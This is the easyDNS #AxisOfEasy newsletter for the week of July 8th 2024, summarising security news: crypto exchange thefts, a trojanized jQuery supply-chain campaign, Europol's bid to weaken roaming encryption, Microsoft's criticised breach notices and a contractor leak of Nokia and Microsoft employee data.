This is your easyDNS #AxisOfEasy Briefing for the week of July 8th 2024 our Technology Correspondent Joann L Barnes and easyCEO Mark E. Jeftovic send out a short briefing on the state of the ‘net and how it affects your business, security and privacy.

To Listen/watch this podcast edition with commentary and insight from Joey Tweets, and Len the Lengend click here.

In this issue: 

• Crypto Thefts Soar to $1.4 Billion in 2024
• Trojanized jQuery Attack Targets Web Developers
• Europol Pushes to Break Mobile Roaming Encryption
• Microsoft Phishing Frenzy? Experts Slam Notification Emails After Russia Hack
• Third-Party Breach Exposes Nokia and Microsoft Employee Data

Elsewhere Online:

• Fujitsu Data Breach Caused by Worm, Not Ransomware
• Scammed Twice? Fake Recovery Services Target Victims
• APT40 Group Linked to Chinese Government Hacks
• Avast Cracks DoNex Ransomware Family, Offers Free Decryption
• Feds Bust AI-Powered Russian Disinformation Network

Crypto Thefts Soar to $1.4 Billion in 2024

Crypto thefts have doubled in 2024. From January 1 to June 24, hackers stole $1.4 billion from crypto exchanges, compared to the same period in 2023, according to TRM Labs.

The record-breaking thefts of 2022, which reached $2 billion by June, remain the highest. In 2024, five major hacks accounted for 70% of the stolen amount. TRM Labs suggests the rise in average token prices could be a reason for the surge.

Private key and seed phrase compromises, smart contract exploits, and flash loan attacks are the main methods used by hackers. The biggest heist occurred in May, targeting DMM Bitcoin, a Japanese exchange, resulting in the theft of over 4,500 BTC, worth more than $300 million at the time.

“Stolen private keys or address poisoning could be the cause,” said TRM Labs researchers. Address poisoning involves sending small amounts of cryptocurrency to create fake transaction histories.

To combat these thefts, TRM Labs recommends regular security audits, robust encryption, multi-signature wallets, secure coding practices, and bounties for returning stolen funds. They emphasize the importance of staying updated on threats, educating employees, and fostering a security-aware culture.

Read:https://www.infosecurity-magazine.com/news/crypto-thefts-double-2024-trm-labs/?&web_view=true

Trojanized jQuery Attack Targets Web Developers

Since May 26, 2024, Phylum has been tracking a supply chain attack involving a tampered version of jQuery. This malicious variant was found on npm, GitHub, and as a CDN-hosted resource on jsDelivr.

The attack is notable for its variability. Dozens of packages contained trojanized jQuery named differently, like jquery.min.js and icon.min.js. Each package had unique exfiltration URLs and included personal files not typically seen in npm publications.

The malicious jQuery alters the end function to send form data to remote URLs. “This attack is unlike most we’ve seen at this scale,” said Phylum researchers.

The trojanized jQuery was found in several packages on GitHub. The attackers even used jsDelivr to make their source look legitimate.

Developers using the compromised jQuery unknowingly send form data to attackers whenever the end or fadeTo function is called. This attack could impact many unsuspecting users who download and use these packages.

The sheer number of packages and the effort to hide the malware suggest a well-coordinated effort. Despite the specific conditions required to trigger the malware, the broad distribution means a wide potential impact, affecting many developers globally.

Read:https://blog.phylum.io/persistent-npm-campaign-shipping-trojanized-jquery/?&web_view=true



Europol Pushes to Break Mobile Roaming Encryption

Europol, the EU’s law enforcement agency, aims to break mobile roaming encryption. This encryption, known as home routing, protects data by encrypting it through the home network while users roam.

Europol claims encryption hinders law enforcement investigations. They argue that removing encryption would help catch criminals more effectively. Europol’s paper describes home routing as a “serious challenge for lawful interception.”

The agency insists they need access to this encrypted traffic. “Europol swears it needs access to this protected traffic simply to catch criminals,” the paper states.

However, removing encryption raises privacy concerns. Breaking encryption could lead to mass surveillance and misuse by government agencies.

Europol suggests two solutions. One, disable privacy-enhancing technologies (PET) in home routing. Two, create a cross-border mechanism within the EU for quick interception requests by service providers.

Despite Europol’s arguments, there are existing methods to pursue criminals, like voluntary cooperation with providers outside the EU and issuing European Investigation Orders (EIOs). These methods are slower but maintain user privacy.

Tampering with encryption could compromise security and privacy, opening the door to potential abuse. Law-abiding citizens worry about the slippery slope from lawful surveillance to mass surveillance.

Read: https://reclaimthenet.org/europol-seeks-to-break-mobile-roaming-encryption

Microsoft Phishing Frenzy? Experts Slam Notification Emails After Russia Hack

In a move raising eyebrows among security experts, Microsoft is facing criticism over its handling of a March cyber attack by suspected Russian government hackers, Midnight Blizzard. The attack breached Microsoft’s systems and targeted customer data.

Microsoft’s customer notification process is under particular scrutiny. The company is emailing affected customers, but these emails bypass the usual secure portal and contain a suspicious link to a non-Microsoft domain, purviewcustomer.powerappsportals.com. Security researchers like Kevin Beaumont and cybersecurity consultants are slamming this approach, noting it mimics phishing tactics and has predictably sowed confusion. Customers are unsure if the emails are legitimate, and the link further fuels these concerns. This confusion is amplified by Microsoft’s silence on the number of impacted organizations and its refusal to comment on potential changes to its notification process.

The fallout extends beyond commercial customers. U.S. cybersecurity agency CISA previously confirmed these same hackers stole emails from federal agencies, highlighting the broader impact of the breach. With both customer data and government emails compromised, Microsoft’s response is raising questions about transparency and prioritizing security best practices.

Read:https://techcrunch.com/2024/07/10/microsoft-emails-that-warned-customers-of-russian-hacks-criticized-for-looking-like-spam-and-phishing/

Third-Party Breach Exposes Nokia and Microsoft Employee Data

Hacker “888” is making waves on Breach Forums, a notorious cybercrime platform. They claim to have leaked the personal and contact details of thousands of employees from both Nokia and Microsoft. There’s a twist: according to “888,” these leaks don’t stem from breaches of the tech giants’ own systems, but rather from a data security failure at a third-party contractor they both work with.

Nokia seems to have been impacted more severely, with data for 7,258 employees in the US and Finland exposed. This includes names, job titles, contact details, and email addresses. The timeframe for this data is murky, ranging from June 2022 to February 2023, and it’s unclear if current or former employees are affected. Microsoft dodged a slightly smaller bullet on July 9th, 2024, when data for 2,047 employees was leaked. Similar details to Nokia’s were exposed, but with the unsettling addition of links to their LinkedIn profiles.

While the lack of passwords and financial information might seem comforting, security experts are on edge. This leaked data is a prime target for malicious actors looking to launch phishing attacks or steal identities. The presence of LinkedIn profiles for Microsoft employees is particularly concerning, as it grants attackers valuable details for social engineering tactics. With both companies and their employees potentially facing a wave of cyberattacks, this leak exposes a critical vulnerability: the data security practices of third-party contractors in the tech industry.

Read: https://hackread.com/hacker-leaks-microsoft-nokia-employee-details/

Elsewhere Online:

 
Fujitsu Data Breach Caused by Worm, Not Ransomware
Read: https://www.darkreading.com/endpoint-security/fujitsu-suffers-worm-attack-not-ransomware

Scammed Twice? Fake Recovery Services Target Victims
Read: https://www.theregister.com/2024/07/09/australia_rescam_warning

APT40 Group Linked to Chinese Government Hacks
Read: https://hackread.com/five-eyes-blames-chinese-apt40-for-govt-hacks/

Avast Cracks DoNex Ransomware Family, Offers Free Decryption
Read: https://www.helpnetsecurity.com/2024/07/08/decryptor-donex-muse-darkrace-fake-lockbit-3-0/

Feds Bust AI-Powered Russian Disinformation Network
Read: https://www.darkreading.com/cloud-security/feds-uncover-genai-enabled-russian-troll-farm